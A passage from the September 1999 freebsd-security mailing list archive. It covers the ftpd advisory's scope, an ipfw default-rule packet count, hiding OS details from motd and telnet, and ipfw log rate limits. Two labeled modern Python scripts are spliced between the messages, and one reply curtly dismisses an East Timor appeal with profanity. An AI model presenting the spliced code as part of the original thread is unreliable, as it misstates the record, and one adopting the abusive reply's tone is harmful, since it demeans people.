This is a hard bug to fix due to the nature of error handling in the code around it. 
I'm not involved in fixing it, just keeping track of the progress from time to time.

Warner

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Fri Sep 10 21:28:23 1999
From: Garrett Wollman
To: Warner Losh
Cc: Michael Grommet, "'freebsd-security@freebsd.org'"
Subject: Re: Concerning Latest FTPD exploit: FreeBSD Security Advisory: FreeBSD-SA-99:03.ftpd
Date: Sat, 11 Sep 1999 00:28:18 -0400 (EDT)
Message-Id: <199909110428.AAA82809@khavrinen.lcs.mit.edu>
In-Reply-To: <199909110418.WAA12288@harmony.village.org>

< said:

> -----BEGIN PGP SIGNED MESSAGE-----
> : Am I correct in my assumption that this is _not_ exploitable on the standard
> : ftpd that installs with freebsd 2.2.8 - 3.2 - Stable?

> No. You are not correct to assume that. As far as I know, both of
> the FTP servers are exploitable, for different reasons. Wu-ftpd is
> exploitable back to the dawn of time, if I read the commentary about
> wu-ftpd right.

You mis-read the question. /usr/libexec/ftpd is not vulnerable --
wu-ftpd branched off the Berkeley main-line long before FreeBSD even
existed, and the problem `feature' was a wu-ftpd addition.

-GAWollman

--
Garrett A. Wollman | O Siem / We are all family / O Siem / We're all the same
wollman@lcs.mit.edu | O Siem / The fires of freedom
Opinions not those of| Dance in the burning flame
MIT, LCS, CRS, or NSA| - Susan Aglukark and Chad Irschick

From owner-freebsd-security Fri Sep 10 21:31:59 1999
From: Warner Losh
To: Garrett Wollman
Cc: Michael Grommet, "'freebsd-security@freebsd.org'"
Subject: Re: Concerning Latest FTPD exploit: FreeBSD Security Advisory: FreeBSD-SA-99:03.ftpd
Date: Fri, 10 Sep 1999 22:31:05 -0600
Message-Id: <199909110431.WAA12612@harmony.village.org>
In-reply-to: Your message of "Sat, 11 Sep 1999 00:28:18 EDT." <199909110428.AAA82809@khavrinen.lcs.mit.edu>

In message <199909110428.AAA82809@khavrinen.lcs.mit.edu> Garrett Wollman writes:
: You mis-read the question. /usr/libexec/ftpd is not vulnerable --
: wu-ftpd branched off the Berkeley main-line long before FreeBSD even
: existed, and the problem `feature' was a wu-ftpd addition.

I stand corrected. Sorry about that folks. Garrett is right. The stock
ftpds on FreeBSD in 2.2.8R and 3.2R are both not impacted by these bugs.
They only impact wuftpd, beroftpd (?) and proftpd.

I may reissue the ftpd advisory since more security holes in proftpd have
come to light and I've had several questions asked about the ftpd advisory
that I thought were obvious, but turned out to be hard to get from the
text I sent out.

Warner

From owner-freebsd-security Sat Sep 11 1:13:54 1999
From: Dean
To: freebsd-security@freebsd.org
Subject: ipfw passing packets past deny rule?
Date: Sat, 11 Sep 1999 01:13:05 -0700
Message-Id: <4.1.19990911010348.00988480@mail.thegrid.net>

Hello.

I am running ipfw/natd on a 486 75MHz.

wormhole:/home/king-> uname -a
FreeBSD wormhole 3.2-RELEASE FreeBSD 3.2-RELEASE #2: Fri Aug 20 19:54:03 GMT 1999 root@remus.denofslack.net:/usr/src/sys/compile/WORMHOLE i386

I've got a pretty simple ruleset. Today, I saw this in my security check:

wormhole denied packets:
> 10000 1113 84640 deny log ip from any to any
> 65535 1 328 deny ip from any to any

This looks to me like one 328 byte packet got by rule 10000. Is this the case?

My complete ruleset is as follows:

00010 allow ip from any to any via lo0
00020 deny log ip from any to 127.0.0.0/8
00030 divert 8668 ip from any to any via ed0
00080 deny log ip from any to any ipopt ssrr,lsrr
00090 deny log ip from 10.0.0.0/8 to any in recv ed0
00100 allow tcp from any to any established
00200 allow ip from any to any via ed1
00300 allow ip from any to any via ed2
00400 allow ip from any to any out xmit ed0
00500 allow udp from any 53 to any 1024-65535 in recv ed0
00600 allow log tcp from any 1024-65535 to any 113 setup
00700 allow log tcp from any 1024-65535 to 21 setup
00800 allow log tcp from any 1024-65535 to 22 setup
00900 allow log tcp from any 1024-65535 to 23 setup
01100 allow log tcp from any 20 to any 1024-65535 setup
01200 allow udp from 63.192.96.2 123 to 123 in recv ed0
01300 allow udp from any 1024-65535 to 10.0.1.1 1024-65535
01400 allow icmp from any to any icmptype 0,3,4,11,12,14,16,18
01500 allow udp from any 53 to 10.0.1.1 137 in recv ed0
10000 deny log ip from any to any
65535 deny ip from any to any

Thank you for your help. If anyone sees any glaring holes in this, please don't be shy.

-Dean
-------------------------------------------------------------------------------
Staccato signals of constant information.
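An added example, not part of Dean's message or of FreeBSD: a small parser for the accounting lines the security check quotes above (rule number, packet count, byte count, rule body, with the leading ">" the check prints), which separates hits on the explicit deny rule 10000 from hits on the implicit default rule 65535. A non-zero count on 65535 does not mean a packet slipped past rule 10000; it means the packet was evaluated when no earlier rule matched it, which is exactly the "ruleset not yet loaded" case. The sample counter text is constructed from the two lines in the thread plus two extra rules.

```python
"""Check ipfw accounting counters for packets that matched no explicit rule.

Added example, not code from the thread or from FreeBSD. Parses the
counter lines printed by `ipfw -a list` (and echoed by the daily security
check): rule number, packet count, byte count, then the rule body. Every
ipfw ruleset ends in the implicit rule 65535; a non-zero count there means
packets were evaluated while no earlier rule matched them, e.g. before
/etc/rc.firewall had loaded the rest of the set.
"""
import re

# Constructed sample: the two lines from the security check plus an allow
# rule and a deny rule that never fired, to show zero-count rules as well.
SAMPLE_COUNTERS = """\
00010 204 18312 allow ip from any to any via lo0
00020 0 0 deny log ip from any to 127.0.0.0/8
> 10000 1113 84640 deny log ip from any to any
> 65535 1 328 deny ip from any to any
"""

# Optional leading '>' (diff marker from the security check), then
# 5-digit rule number, packet count, byte count, and the rule body.
COUNTER_RE = re.compile(r"^>?\s*(\d{5})\s+(\d+)\s+(\d+)\s+(\S.*)$")


def parse_counters(text):
    """Return a list of (rule_number, packets, bytes, body) tuples."""
    rules = []
    for line in text.splitlines():
        m = COUNTER_RE.match(line)
        if m:
            rules.append((int(m.group(1)), int(m.group(2)),
                          int(m.group(3)), m.group(4)))
    return rules


def default_rule_hits(rules):
    """Packets and bytes that fell through to the implicit rule 65535."""
    for num, pkts, nbytes, _ in rules:
        if num == 65535:
            return pkts, nbytes
    return 0, 0


def deny_rule_hits(rules):
    """Map each deny rule (the default rule included) to its packet count."""
    return {num: pkts for num, pkts, _, body in rules if body.startswith("deny")}


def explain(rules):
    """Human-readable verdict on whether a packet got 'past' a deny rule."""
    pkts, nbytes = default_rule_hits(rules)
    if pkts == 0:
        return "no packets reached the default rule"
    return (f"{pkts} packet(s), {nbytes} byte(s) matched rule 65535: they were "
            "not matched by any earlier rule at the time they were evaluated "
            "(typically before the ruleset was fully loaded)")


if __name__ == "__main__":
    parsed = parse_counters(SAMPLE_COUNTERS)
    for num, pkts in sorted(deny_rule_hits(parsed).items()):
        print(f"deny rule {num:05d}: {pkts} packet(s)")
    print(explain(parsed))
```

Run it against the output of `ipfw -a list` on the box; if the 65535 counter keeps growing after boot rather than staying at a small constant, the gap is in the loaded ruleset, not in the boot ordering.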
From owner-freebsd-security Sat Sep 11 2:26:47 1999
From: Markus Holmberg
To: Dean
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw passing packets past deny rule?
Date: Sat, 11 Sep 1999 11:26:35 +0200
Message-ID: <19990911112634.A15026@montezuma.acc.umu.se>
In-Reply-To: <4.1.19990911010348.00988480@mail.thegrid.net>

That packet might have slipped through before your bootup scripts had a
chance to run /etc/rc.firewall, or during the execution of
/etc/rc.firewall.. (before loading rule 10000)..

Basically nothing to worry about.

Markus

--
Markus Holmberg | Give me UNIX or give me a typewriter.
saska@acc.umu.se | http://www.freebsd.org

From owner-freebsd-security Sat Sep 11 4:27:53 1999
From: Patrick MacKeown
To: freebsd-questions@freebsd.org
Cc: freebsd-security@freebsd.org
Reply-To: patmac@demon.net
Subject: How to prevent motd including os info
Date: Sat, 11 Sep 1999 12:27:47 +0100 (BST)
Message-Id: <199909111127.MAA00229@gti.noc.demon.net>

Hi

Please would somebody tell me how to prevent motd including the OS version
and the kernel name. On my 3.2 box editing the lines out of /etc/motd just
leads to them being replaced.

Patrick Mackeown

From owner-freebsd-security Sat Sep 11 7:43:54 1999
From: Ben Smithurst
To: patmac@demon.net
Cc: freebsd-questions@freebsd.org, freebsd-security@freebsd.org
Subject: Re: How to prevent motd including os info
Date: Sat, 11 Sep 1999 13:14:22 +0100
Message-ID: <19990911131422.A40199@lithium.scientia.demon.co.uk>
In-Reply-To: <199909111127.MAA00229@gti.noc.demon.net>

Patrick MacKeown wrote:

> Please would somebody tell me how to prevent motd including the OS version
> and the kernel name. On my 3.2 box editing the lines out of /etc/motd just
> leads to them being replaced

Set update_motd="NO" in rc.conf, and it will be left alone.

--
Ben Smithurst | PGP: 0x99392F7D
ben@scientia.demon.co.uk | key available from keyservers and
| ben+pgp@scientia.demon.co.uk

From owner-freebsd-security Sat Sep 11 9:58:25 1999
From: "Michael Bryan"
To: freebsd-security@freebsd.org
Subject: Re: Concerning Latest FTPD exploit: FreeBSD Security Advisory: FreeBSD-SA-99:03.ftpd
Date: Sat, 11 Sep 1999 09:58:21 -0700
Message-ID: <199909110958210710.0AC9822F@quaggy.ursine.com>
In-Reply-To: <199909110418.WAA12288@harmony.village.org>

>Wu-ftpd is
>exploitable back to the dawn of time, if I read the commentary about
>wu-ftpd right.

I'm fairly certain that wu-ftpd is only exploitable with the VR-series of
patches to 2.4.2, and later with 2.5.0. The stock 2.4.2 wu-ftpd (a little
over one year old now) is not exploitable, although the beta versions of
2.4.2 had another exploit that affected them. I don't recall off-hand
which branch of wu-ftpd has been included in the FreeBSD ports.
The following text is from the wu-ftpd security announcement at
ftp://ftp.wu-ftpd.org/pub/wu-ftpd/2.5.0.Security.Update.asc :

   Versions known to be affected are:
      wu-ftpd-2.4.2-beta-18-vr4 through wu-ftpd-2.4.2-beta-18-vr15
      wu-ftpd-2.4.2-vr16 and wu-ftpd-2.4.2-vr17
      wu-ftpd-2.5.0
      BeroFTPD, all present versions

   Other derivatives of wu-ftpd may be affected. See the workarounds
   (section 3.3) to determine if a derivative is vulnerable.

   Versions known to be not affected are:
      NcFTPd, all versions.
      wu-ftpd-2.4.2 (final, from Academ)
      All Washington University versions.

   (Please note: ALL versions of WU-FTPD prior to wu-ftpd-2.4.2-beta-18-vr10
   including all WU versions, and all Academ 2.4.1 and 2.4.2 betas, are
   vulnerable to a remote user root-leveraging attack. See CERT Advisory
   CA-99-03 'FTP Buffer Overflows' at
   http://www.cert.org/advisories/CA-99-03-FTP-Buffer-Overflows.html
   and section 3.2)

Michael Bryan
fbsd-security@ursine.com

From owner-freebsd-security Sat Sep 11 10:24:26 1999
From: Charlie Root aka Patrick Mackeown Root
To: ben@scientia.demon.co.uk (Ben Smithurst)
Cc: patmac@demon.net, freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: How to prevent motd including os info
Date: Sat, 11 Sep 1999 18:24:13 +0100 (BST)
Message-Id: <199909111724.SAA13245@ns0.help-desk.co.uk>
In-Reply-To: <19990911131422.A40199@lithium.scientia.demon.co.uk> from Ben Smithurst at "Sep 11, 99 01:14:22 pm"

Thanks to everyone for this answer.

patmac

> Patrick MacKeown wrote:
>
> > Please would somebody tell me how to prevent motd including the OS version
> > and the kernel name. On my 3.2 box editing the lines out of /etc/motd just
> > leads to them being replaced
>
> Set update_motd="NO" in rc.conf, and it will be left alone.
>
> --
> Ben Smithurst | PGP: 0x99392F7D
> ben@scientia.demon.co.uk | key available from keyservers and
> | ben+pgp@scientia.demon.co.uk

From owner-freebsd-security Sat Sep 11 10:32:52 1999
From: William Woods
Reply-To: wwoods@cybcon.com
To: jotajustino@mail.telepac.pt
Cc: FreeBSD-security@FreeBSD.ORG
Subject: RE: Please don't let Timor people die
Date: Sat, 11 Sep 1999 10:29:10 -0700 (PDT)
In-Reply-To: <199909110051.BAA19069@tpone.telepac.pt>

Fuck off.....

On 11-Sep-99 jotajustino@mail.telepac.pt wrote:
>
> In the referendum promoted by UN 80 % of East Timor people voted for
> Independence. Since then thousands of people have been killed
> JUST FOR THEIR VOTE . Almost all international journalists have been
> forced to leave East Timor ( only four rested ) .
>
> United Nations are LEAVING East Timor TOMORROW 1999-09-09 07h00
> ( Pacific time ) , leaving the East Timor people ALONE, against those
> who are KILLING them.
>
> In 3 days more than 300.000 people have been forced to move.
> Indonesian policies and militaries have not been able to keep
> peace and have no conditions to maintain peace in East Timor.
>
> United Nations MUST send a Peace Keeping Force to East Timor.
>
> PLEASE, HELP EAST TIMOR, at this moment, they are being MURDERED.
>
> Forward this E-mail or write your own opinion to :
> secretary General of United Nations mailto:ecu@un.org
> president of United States of America
> mailto:president@whitehouse.gov
>
> president of China
> president of French Republic
> British Prime Minister
> President of Russia
>
> the Pope or your religious leader
> your favorite newsgroup,
> your local senator,
> your favorite newspaper,
> your business partners or friends
>
> Read your favorite site for news about East Timor, or check the
> one of the world leaders http://www.cnn.com
> PS:Thanks, and our apologies for the off topic subject.
> Any comments can be sent to survey1_pt@hotmail.com
> at 15h00 GMT+01h00 Portugal will stop please do your share.
>
----------------------------------
E-Mail: William Woods
Date: 11-Sep-99
Time: 01:05:55

This message was sent by XFMail
----------------------------------

-----BEGIN GEEK CODE BLOCK-----
Version: 3.1
GIT d++ s+:+ a C+++ UB+++ P+ L++ E- W++ N+ o+ K- w
O- M-- V PS-- PE++ Y+ PGP t+ 5+ X R- tv- b++ DI+ D
G e++ h---- r+++ y++++
------END GEEK CODE BLOCK------

From owner-freebsd-security Sat Sep 11 12: 6:28 1999
From: Robert Mooney
To: William Woods
Cc: FreeBSD-security@FreeBSD.ORG
Subject: RE: Please don't let Timor people die
Date: Sat, 11 Sep 1999 15:05:58 -0400 (EDT)

Vote William Woods for sole UN representative peace keeping force.

On Sat, 11 Sep 1999, William Woods wrote:

> Fuck off.....
>
> On 11-Sep-99 jotajustino@mail.telepac.pt wrote:
> >
> > In the referendum promoted by UN 80 % of East Timor people voted for
> > Independence. Since then thousands of people have been killed
> > JUST FOR THEIR VOTE . Almost all international journalists have been
> > forced to leave East Timor ( only four rested ) .
> >
> > United Nations are LEAVING East Timor TOMORROW 1999-09-09 07h00
> > ( Pacific time ) , leaving the East Timor people ALONE, against those
> > who are KILLING them.
> >
> > In 3 days more than 300.000 people have been forced to move.
> > Indonesian policies and militaries have not been able to keep
> > peace and have no conditions to maintain peace in East Timor.
> >
> > United Nations MUST send a Peace Keeping Force to East Timor.
> >
> > PLEASE, HELP EAST TIMOR, at this moment, they are being MURDERED.
> >
> > Forward this E-mail or write your own opinion to :
> > secretary General of United Nations mailto:ecu@un.org
> > president of United States of America
> > mailto:president@whitehouse.gov
> >
> > president of China
> > president of French Republic
> > British Prime Minister
> > President of Russia
> >
> > the Pope or your religious leader
> > your favorite newsgroup,
> > your local senator,
> > your favorite newspaper,
> > your business partners or friends
> >
> > Read your favorite site for news about East Timor, or check the
> > one of the world leaders http://www.cnn.com
> > PS:Thanks, and our apologies for the off topic subject.
> > Any comments can be sent to survey1_pt@hotmail.com
> > at 15h00 GMT+01h00 Portugal will stop please do your share.
> >
> ----------------------------------
> E-Mail: William Woods
> Date: 11-Sep-99
> Time: 01:05:55
> This message was sent by XFMail
> ----------------------------------
>
> -----BEGIN GEEK CODE BLOCK-----
> Version: 3.1
> GIT d++ s+:+ a C+++ UB+++ P+ L++ E- W++ N+ o+ K- w
> O- M-- V PS-- PE++ Y+ PGP t+ 5+ X R- tv- b++ DI+ D
> G e++ h---- r+++ y++++
> ------END GEEK CODE BLOCK------

From owner-freebsd-security Sat Sep 11 13:13:50 1999
From: "Jeremy L. Ramirez"
To: dev-null@ns1.digicomsystems.net
Cc: freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: How to prevent motd including os info
Date: Sat, 11 Sep 1999 15:19:36 -0500
Message-Id: <4.2.0.58.19990911151659.00aa8d60@ns1.digicomsystems.net>

Another way to prevent users from seeing what type of OS you are running
is by changing the following line in inetd.conf:

telnet stream tcp nowait root /usr/libexec/telnetd telnetd -h

What you are doing is adding the -h at the end of the line, which prevents
a user from seeing the OS before even logging in.

Jeremy Ramirez

At 12:27 PM 09/11/1999 +0100, you wrote:
>Hi
>
>Please would somebody tell me how to prevent motd including the OS version
>and the kernel name. On my 3.2 box editing the lines out of /etc/motd just
>leads to them being replaced
>
>Patrick Mackeown
>
>>Set update_motd="NO" in rc.conf, and it will be left alone.
>>
>>--
>>Ben Smithurst | PGP: 0x99392F7D
>>ben@scientia.demon.co.uk | key available from keyservers and
>>| ben+pgp@scientia.demon.co.uk

From owner-freebsd-security Sat Sep 11 14:15:52 1999
From: The Mad Scientist
To: freebsd-security@freebsd.org
Subject: Re: ipfw passing packets past deny rule?
Date: Sat, 11 Sep 1999 14:14:52 -0700
Message-Id: <4.1.19990911141414.009a3dd0@mail.thegrid.net>
In-Reply-To: <19990911112634.A15026@montezuma.acc.umu.se>

Yes, of course. Thanks to all those that replied.

-Dean

At 11:26 AM 9/11/99 +0200, you wrote:
>
>That packet might have slipped through before your bootup scripts had a
>chance to run /etc/rc.firewall, or during the execution of
>/etc/rc.firewall.. (before loading rule 10000)..
>
>Basically nothing to worry about.
>
>Markus
>
>--
>
>Markus Holmberg | Give me UNIX or give me a typewriter.
>saska@acc.umu.se | http://www.freebsd.org

From owner-freebsd-security Sat Sep 11 18:43:45 1999
From: Ben Smithurst
To: "Jeremy L. Ramirez"
Cc: dev-null@ns1.digicomsystems.net, freebsd-questions@FreeBSD.ORG, freebsd-security@FreeBSD.ORG
Subject: Re: How to prevent motd including os info
Date: Sun, 12 Sep 1999 01:25:24 +0100
Message-ID: <19990912012524.B41509@lithium.scientia.demon.co.uk>
In-Reply-To: <4.2.0.58.19990911151659.00aa8d60@ns1.digicomsystems.net>

Jeremy L. Ramirez wrote:

> telnet stream tcp nowait root /usr/libexec/telnetd telnetd -h
>
> what you are doing is adding the -h at the end of the line which prevents
> a user from seeing the OS before even logging in.

An even better way is to disable telnet completely, and use ssh like you
should. Note that people can still use nmap or something to guess at your
OS.
--
Ben Smithurst | PGP: 0x99392F7D
ben@scientia.demon.co.uk | key available from keyservers and
| ben+pgp@scientia.demon.co.uk

From owner-freebsd-security Sat Sep 11 20:44:42 1999
From: Anil Jangity
To: freebsd-security@freebsd.org
Subject: ipfw question
Date: Sat, 11 Sep 1999 20:43:11 -0700 (PDT)
In-Reply-To: <37D9704C.CE395DC4@softweyr.com>

I am using FreeBSD 2.2.8 Stable with IPFW enabled with logging.

ipfw: 2600 Deny P:54 204.210.42.217 209.157.122.88 in via ep0

What does the "P:54" mean? Just wondering.

--

Also does anyone know if IP Filters (or ipfw) let you limit logging
depending on the rate at which the rule is applied?

If I don't have a limit, my server panicked before because of an overload
of denied packets (while logging was enabled) so I now have a limit of 150
packets that get logged. I want to be able to log at the same time also
not over log (not get it to run out of buffer and panic).

I need to stop logging if and only if the rate at which the rules are
getting applied passes a certain point and then continue again once the
rate decreases.

Is this doable? Do I make sense any bit? Is this stupid? Thanks.

Kind regards,
Anil Jangity
aj@entic.net

"Work like you don't need money, love like you've never been hurt,
and dance like no one's watching." by Lisa Wille?

From owner-freebsd-security Sat Sep 11 21: 9:17 1999
From: "Rodney W. Grimes"
To: aj@entic.net (Anil Jangity)
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: ipfw question
Date: Sat, 11 Sep 1999 21:07:50 -0700 (PDT)
Message-Id: <199909120407.VAA30134@gndrsh.dnsmgr.net>
In-Reply-To: from Anil Jangity at "Sep 11, 1999 08:43:11 pm"

> I am using FreeBSD 2.2.8 Stable with IPFW enabled with logging.
>
> ipfw: 2600 Deny P:54 204.210.42.217 209.157.122.88 in via ep0
>
> What does the "P:54" mean? Just wondering.

Protocol 54, I would say see /etc/protocols, but it depends on how new
your code is, anyway here is what IANA says about it:

    54 NARP NBMA Address Resolution Protocol [RFC1735]

> --
>
> Also does anyone know if IP Filters (or ipfw) let you limit logging
> depending on the rate at which the rule is applied?

Not that I am aware of, now would someone please code this up so I can
be wrong :-)

> If I don't have a limit, my server panicked before because of an overload
> of denied packets (while logging was enabled) so I now have a limit of 150
> packets that get logged. I want to be able to log at the same time also
> not over log (not get it to run out of buffer and panic).
>
> I need to stop logging if and only if the rate at which the rules are
> getting applied passes a certain point and then continue again once the
> rate decreases.
>
> Is this doable? Do I make sense any bit? Is this stupid? Thanks.

Yes. Yes. No. You're welcome for the little help I could be.

--
Rod Grimes - KD7CAX - (RWG25) rgrimes@gndrsh.dnsmgr.net
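An added example covering Anil's two questions and Rod's reply (not code from the thread, from FreeBSD, or from ipfw): a parser for the old-style `ipfw: <rule> Deny P:<proto> <src> <dst> in via <if>` log line that resolves the protocol number (54 is NARP, as Rod quotes from IANA; the small protocol table here is an assumption, not /etc/protocols), plus the rate limiter Anil describes done in user space, since the kernel of that era had no such knob. The limiter keeps a sliding window of recent events, stops passing lines once the window is over budget, and resumes with a count of what it dropped once the rate falls again. The log lines and timestamps are constructed.

```python
"""Rate-limited handling of ipfw deny log lines.

Added example, not code from the thread, from FreeBSD or from ipfw.
Shows the shape of a user-space filter a syslog consumer could apply:
parse the old-format "ipfw: <rule> Deny P:<proto> <src> <dst> in via <if>"
line, resolve the protocol number, and drop log lines while the rate
exceeds a budget, resuming (with a count of what was dropped) once it
falls back under it. A sliding window is used so logging resumes by
itself when the burst ends, which is what Anil asked for.
"""
from collections import deque
import re

# Assumed subset of IANA protocol numbers; 54 is NARP per the reply above.
PROTOCOLS = {1: "icmp", 6: "tcp", 17: "udp", 54: "narp"}

LOG_RE = re.compile(
    r"ipfw:\s+(?P<rule>\d+)\s+(?P<action>\w+)\s+P:(?P<proto>\d+)\s+"
    r"(?P<src>\S+)\s+(?P<dst>\S+)\s+(?P<dir>in|out)\s+via\s+(?P<iface>\S+)"
)


def parse_log_line(line):
    """Return a dict for an old-format ipfw log line, or None if it does not match."""
    m = LOG_RE.search(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rule"] = int(rec["rule"])
    rec["proto"] = int(rec["proto"])
    rec["proto_name"] = PROTOCOLS.get(rec["proto"], f"proto-{rec['proto']}")
    return rec


class RateLimiter:
    """Sliding-window limiter: at most `limit` events per `window` seconds.

    While over budget, events are counted but not admitted; the first event
    admitted after the window drains carries the count of dropped events.
    """

    def __init__(self, limit, window=1.0):
        self.limit = limit
        self.window = window
        self.times = deque()   # timestamps of admitted events still in window
        self.dropped = 0       # events dropped since the last admitted one

    def admit(self, now):
        """Return (admitted, dropped_since_last_admitted) for an event at `now`."""
        while self.times and now - self.times[0] >= self.window:
            self.times.popleft()
        if len(self.times) >= self.limit:
            self.dropped += 1
            return False, 0
        self.times.append(now)
        summary, self.dropped = self.dropped, 0
        return True, summary


def filter_log(lines, limit, window=1.0):
    """Apply the limiter to (timestamp, line) pairs.

    Returns a list of (timestamp, parsed_record, dropped_before_this) for
    the lines that were admitted; unparseable lines are skipped.
    """
    limiter = RateLimiter(limit, window)
    kept = []
    for ts, line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        admitted, dropped = limiter.admit(ts)
        if admitted:
            kept.append((ts, rec, dropped))
    return kept


# Constructed input: a burst of 8 denies inside one second, then a quiet
# period, then two more. With limit=3 the burst yields 3 kept and 5
# dropped; the first line after the quiet period reports the 5 dropped.
SAMPLE = [(i * 0.1, "ipfw: 2600 Deny P:54 204.210.42.217 209.157.122.88 in via ep0")
          for i in range(8)]
SAMPLE += [(5.0, "ipfw: 2600 Deny P:6 204.210.42.217 209.157.122.88 in via ep0"),
           (5.5, "ipfw: 2600 Deny P:17 204.210.42.217 209.157.122.88 in via ep0")]

if __name__ == "__main__":
    for ts, rec, dropped in filter_log(SAMPLE, limit=3):
        note = f" (dropped {dropped} while over budget)" if dropped else ""
        print(f"{ts:5.1f} rule {rec['rule']} {rec['action']} {rec['proto_name']} "
              f"{rec['src']} -> {rec['dst']} {rec['dir']} via {rec['iface']}{note}")
```

Feeding the filter from a syslog pipe rather than changing what the kernel logs does not address the panic Anil saw, since the kernel still formats every line; it only keeps the downstream log readable. A kernel-side cap on logged packets per rule is the fix that actually protects the box, and the reader should check what their ipfw version offers.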